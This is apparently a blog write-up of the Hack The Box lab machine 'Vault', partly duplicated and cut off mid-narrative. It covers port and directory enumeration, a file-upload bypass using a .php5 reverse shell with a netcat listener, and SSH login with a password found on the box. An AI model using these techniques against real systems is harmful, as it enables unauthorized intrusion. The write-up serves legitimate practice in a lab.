Hackthebox - Vault

PreviousHackthebox - Toolbox NextHackthebox - Updown

Last updated 7 months ago

Hackthebox - Vault

Nmap

┌─[✗]─[gabrielle@parrot]─[~]
└──╼ $sudo nmap -p- -sV -sC 10.10.10.109
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-26 20:05 EDT
Nmap scan report for 10.10.10.109
Host is up (0.057s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a6:9d:0f:7d:73:75:bb:a8:94:0a:b7:e3:fe:1f:24:f4 (RSA)
|   256 2c:7c:34:eb:3a:eb:04:03:ac:48:28:54:09:74:3d:27 (ECDSA)
|_  256 98:42:5f:ad:87:22:92:6d:72:e6:66:6c:82:c1:09:83 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.91 seconds

Port 80

Wfuzz was useless from root but it mentionned a customer. If we try to go to /sparklays we get a Forbidden which means that we could try wfuzz again but with this.

I had to wfuzz multiple times but here are the commands and interesting results I got:

wfuzz -c --hc 404 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt http://10.10.10.109/sparklays/FUZZ
000000370:   301        9 L      28 W       323 Ch      "design"  

wfuzz -c --hc 404 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/Common-PHP-Filenames.txt http://10.10.10.109/sparklays/FUZZ

000000029:   200        3 L      2 W        16 Ch       "login.php"                                                                                                                  
000000016:   200        13 L     38 W       615 Ch      "admin.php"  

wfuzz -c --hc 404 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt http://10.10.10.109/sparklays/design/FUZZ

000000164:   301        9 L      28 W       331 Ch      "uploads"

In the meantime, wfuzz was quite a pain so I tried gobuster which I usually prefer (but wanted to try out wfuzz lol). And I got this

┌─[gabrielle@parrot]─[/usr/share/wordlists]
└──╼ $gobuster dir -u http://10.10.10.109/sparklays/design/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -x php,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.109/sparklays/design/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 308]
/.html                (Status: 403) [Size: 309]
/uploads              (Status: 301) [Size: 331] [--> http://10.10.10.109/sparklays/design/uploads/]
/design.html          (Status: 200) [Size: 72]

So from these we have:

http://10.10.10.109/sparklays/design/uploads/
http://10.10.10.109/sparklays/admin.php
http://10.10.10.109/sparklays/login.php
http://10.10.10.109/sparklays/design/design.html

On login.php we get an access denied
But on admin.php we get a login page

I tried bruteforcing along with possible weak password but did not get anywhere.

And if we click on change logo we end up here so we can play with the upload function.

I tried a few file extensions and got this working with php5. So I downloaded php-reverse-shell.php5 on the server after modifying the file with my ip address. I set up my listener nc -nlvp 4444 And then I accessed this page from the browser (remember the uploads directory we found before) http://10.10.10.109/sparklays/design/uploads/php-reverse-shell.php5

And I got a shell as www-data:

PreviousHackthebox - Toolbox NextHackthebox - Updown

Last updated 7 months ago

Nmap

┌─[✗]─[gabrielle@parrot]─[~]
└──╼ $sudo nmap -p- -sV -sC 10.10.10.109
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-26 20:05 EDT
Nmap scan report for 10.10.10.109
Host is up (0.057s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a6:9d:0f:7d:73:75:bb:a8:94:0a:b7:e3:fe:1f:24:f4 (RSA)
|   256 2c:7c:34:eb:3a:eb:04:03:ac:48:28:54:09:74:3d:27 (ECDSA)
|_  256 98:42:5f:ad:87:22:92:6d:72:e6:66:6c:82:c1:09:83 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.91 seconds

Port 80

We have this page

Wfuzz was useless from root but it mentionned a customer. If we try to go to /sparklays we get a Forbidden which means that we could try wfuzz again but with this.

I had to wfuzz multiple times but here are the commands and interesting results I got:

wfuzz -c --hc 404 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt http://10.10.10.109/sparklays/FUZZ
000000370:   301        9 L      28 W       323 Ch      "design"  

wfuzz -c --hc 404 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/Common-PHP-Filenames.txt http://10.10.10.109/sparklays/FUZZ

000000029:   200        3 L      2 W        16 Ch       "login.php"                                                                                                                  
000000016:   200        13 L     38 W       615 Ch      "admin.php"  

wfuzz -c --hc 404 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt http://10.10.10.109/sparklays/design/FUZZ

000000164:   301        9 L      28 W       331 Ch      "uploads"

In the meantime, wfuzz was quite a pain so I tried gobuster which I usually prefer (but wanted to try out wfuzz lol). And I got this

┌─[gabrielle@parrot]─[/usr/share/wordlists]
└──╼ $gobuster dir -u http://10.10.10.109/sparklays/design/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -x php,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.109/sparklays/design/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 308]
/.html                (Status: 403) [Size: 309]
/uploads              (Status: 301) [Size: 331] [--> http://10.10.10.109/sparklays/design/uploads/]
/design.html          (Status: 200) [Size: 72]

So from these we have:

http://10.10.10.109/sparklays/design/uploads/
http://10.10.10.109/sparklays/admin.php
http://10.10.10.109/sparklays/login.php
http://10.10.10.109/sparklays/design/design.html

On login.php we get an access denied
But on admin.php we get a login page

I tried bruteforcing along with possible weak password but did not get anywhere.

On /design/design.html we get this
And if we click on change logo we end up here so we can play with the upload function.

And I got a shell as www-data:

I chose to play with this machine because I wanted to practice pivoting. So let's check what we have available here in terms of network with arp -a (if for some reason arp -a does not work a friend of mine uses a cool command for i in {1..254} ;do (ping 192.168.122.$i -c 1 -w 5 >/dev/null && echo "192.168.122.$i" &) ;done). But here arp -a works and we get this: But first let's see if we can mobe to a user. if we ls on /home we have 2 users dave and alex. If we go to dave's Desktop we find this. So let's try to ssh as Dave (with the password we found Dav3therav3123). It works: